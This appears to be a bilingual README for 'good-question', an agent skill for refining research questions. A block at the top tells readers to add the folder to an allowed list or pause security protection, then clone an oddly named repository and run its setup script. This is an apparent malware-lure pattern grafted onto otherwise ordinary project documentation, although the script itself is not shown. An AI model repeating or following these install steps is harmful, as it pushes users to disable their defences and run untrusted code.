Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/StewardSymbolize/good-question-138.git
cd good-question-138
python setup.py
good-question 是一个帮助研究者打磨科研问题的 agent skill。
它适合这样的时刻:你有一个方向、一个文献 gap、一个 proposal 摘要,或者一堆看起来都能做的想法,但还不确定哪个问题真正值得投入。它不会只给你一串灵感,而是逼近一个更好的研究问题:为什么重要,怎么被证据触及,哪些解释在竞争,什么结果会推翻它,下一步该做什么。
| 你的状态 | 它会帮你做什么 |
|---|---|
| 只有一个模糊兴趣 | 把兴趣拆成可比较的候选问题 |
| 找到了文献 gap | 判断这个 gap 是否真的有理论或实践价值 |
| 已经有一个想法 | 检查重要性、可行性、可证伪性和两周 pilot |
| 想做机制解释 | 拆出竞争性假设和关键判别实验 |
| 准备 proposal 或基金 | 模拟评审会攻击哪里,并给出修补方式 |
| 方向依赖近期进展 | 先做公开来源的 domain brief,再定制问题 |
| 项目卡住了 | 用边界条件、失败信号和条件变化重新定位问题 |
通常会得到一张或几张 Good Question Card。中文用户默认会得到类似这样的本地化卡片:
**暂定题目:** ...
**核心研究问题:** ...
**为什么值得做:** ...
**它挑战了什么默认假设:** ...
**竞争性解释:** ...
**关键判别证据或实验:** ...
**什么结果会推翻它:** ...
**两周内可做的 pilot:** ...
**最强评审质疑:** ...
**下一步动作:** ...重点不是把话说漂亮,而是让你能判断:这个问题值不值得继续推进。
如果你来自生态、遥感、AI4Science、社会科学、生物医学、人文解释型研究或工程系统,先看 docs/field-playbooks.md。
它不是给 agent 的方法卡,而是给研究者的使用指南:每个领域应该提供什么上下文、常见弱问题是什么、好问题通常长什么样、评审最容易攻击哪里,以及该选择导师/评审/合作者/基金哪种模式。
good-question 的流程很简单,但会比较严格:
在这个项目里,一个 good question 至少要通过七个检查:
这个 skill 不是凭空写出来的一套 prompt。它把一些可靠来源中的科研思维动作沉淀成可复用流程:
| 来源线索 | 这个项目吸收了什么 |
|---|---|
| Alon, Fischbach, Stanford Engineering [1][2][3] | 选问题是一种可训练能力,要比较问题、识别陷阱,不要方法先行 |
| Platt [4] | 好问题应该能产生竞争性假设和判别实验 |
| Alvesson & Sandberg [5] | 不要只找 gap,要挑战文献背后的默认假设 |
| Heilmeier Catechism [6] | proposal 必须说清楚目标、受众、风险、成功标准和失败标准 |
| Hamming, Nielsen [7][8] | 科研品味来自长期维护重要问题清单和可攻击机会 |
| Peters [9] | 好问题常常来自对文献、不确定性和约束的反复重写 |
| Orchestra Research [10] | 用结构化 lenses 发散,再用严格标准收束 |
这个项目把问题打磨当成可测试的流程,而不是一次性 prompt。发布前请看 docs/release-checklist.md;贡献案例、领域指南或 source-audit eval 前请看 CONTRIBUTING.md。
大范围发布至少应通过两类检查:evals/pressure-cases.md 检查是否能抵抗方法先行、gap 先行、空泛 impact 等常见失败;evals/source-audit-cases.md 检查引用是否真的支持对应 claim。
发布前可以先运行结构门禁:
powershell -ExecutionPolicy Bypass -File scripts/verify-release.ps1 -Level broadgood-question 可以帮你把问题变尖,但它不是全知百科,不会替你编造领域共识。需要当前领域信息或本地知识不足时,它应该显式进入增强检索,先基于公开来源形成 brief,再明确哪些判断来自证据,哪些只是推断。
它不会把“我没查到”写成“没人做过”,也不会在没有来源时声称某个 gap、共识或最新趋势已经成立。
它也不会把每个想法都包装成“可做”。如果一个问题只有 novelty、没有受众、无法证伪,或者负结果学不到东西,它会建议重写、搁置或放弃。
good-question is a portable agent skill for sharpening research questions.
Use it when you have a direction, a literature gap, a proposal sketch, or several possible ideas, but you are not sure which question is worth real work. It does not simply list ideas. It helps turn a rough direction into a question with stakes, rivals, falsifiers, a feasible pilot, and a clear next move.
| Your situation | What it helps you do |
|---|---|
| Broad interest | Turn it into comparable candidate questions |
| Literature gap | Decide whether the gap has real theoretical or practical value |
| Early idea | Test importance, feasibility, falsifiability, and a two-week pilot |
| Mechanism question | Build rival hypotheses and discriminating tests |
| Proposal or grant | Find reviewer objections and repair the weak points |
| Field depends on recent work | Build a public-source domain brief before question generation |
| Stalled project | Reframe through boundaries, failure signals, and changed conditions |
The usual output is one or more Good Question Cards:
**Working title:** ...
**Research question:** ...
**Why it matters:** ...
**Core assumption challenged:** ...
**Competing hypotheses:** ...
**Discriminating observation or experiment:** ...
**What would falsify it:** ...
**Two-week pilot:** ...
**Strongest reviewer objection:** ...
**Best next action:** ...The goal is not prettier wording. The goal is a better decision about whether the question deserves your time.
If you work in ecology, remote sensing, AI4Science, social science, biomedicine, humanities, or engineering systems, start with docs/field-playbooks.md.
It is a human-facing guide, not an agent method card. It shows what context to provide, common weak questions in each field, what stronger questions usually look like, likely reviewer objections, and which mode to choose.
The workflow is simple, but strict:
In this project, a good question should pass at least seven checks:
This is not just a prompt bundle. It turns research-method advice from reliable sources into reusable agent workflow:
| Source line | What this project uses |
|---|---|
| Alon, Fischbach, Stanford Engineering [1][2][3] | Problem choice is trainable: compare questions, surface traps, and avoid method-first projects |
| Platt [4] | Strong questions create rival hypotheses and discriminating tests |
| Alvesson & Sandberg [5] | Move beyond gap-spotting by challenging assumptions |
| Heilmeier Catechism [6] | Proposals need clear goals, audience, risks, success criteria, and failure criteria |
| Hamming, Nielsen [7][8] | Research taste comes from important-problems lists and attackable openings |
| Peters [9] | Good questions often emerge through iterative rewriting of literature, uncertainty, and constraints |
| Orchestra Research [10] | Diverge with structured lenses, then converge with strict standards |
This project treats question-sharpening as a testable workflow, not a one-off prompt. Before releasing, use docs/release-checklist.md. Before contributing cases, field guidance, or source-audit tests, use CONTRIBUTING.md.
Broad releases should pass both evals/pressure-cases.md, which checks resistance to method-first, gap-first, and vague-impact failures, and evals/source-audit-cases.md, which checks whether citations support the claims attached to them.
Before release, run the structural gate:
powershell -ExecutionPolicy Bypass -File scripts/verify-release.ps1 -Level broadMature-product work has a stricter operating model:
- Read
docs/mature-release-operating-model.mdbefore calling the skill mature. - Record the readiness decision with
evals/mature-release-run-template.md. - Run
powershell -ExecutionPolicy Bypass -File scripts/verify-release.ps1 -Level mature; if the gate fails, keep the release labeled broad/public beta.
good-question can make a question sharper, but it is not an omniscient encyclopedia and should not invent field consensus. When current field context matters or local knowledge is insufficient, it should explicitly enter enhanced retrieval, build a public-source brief first, and label what is evidence versus inference.
It should not turn "I did not find work on X" into "nobody has studied X", and it should not assert a literature gap, consensus, or latest trend without sources.
It also should not make every idea look viable. If a candidate is only novel, has no audience, cannot fail, or teaches nothing when negative, it should be rewritten, parked, or discarded.
The references below are cited as methodological sources for the skill, not as decoration.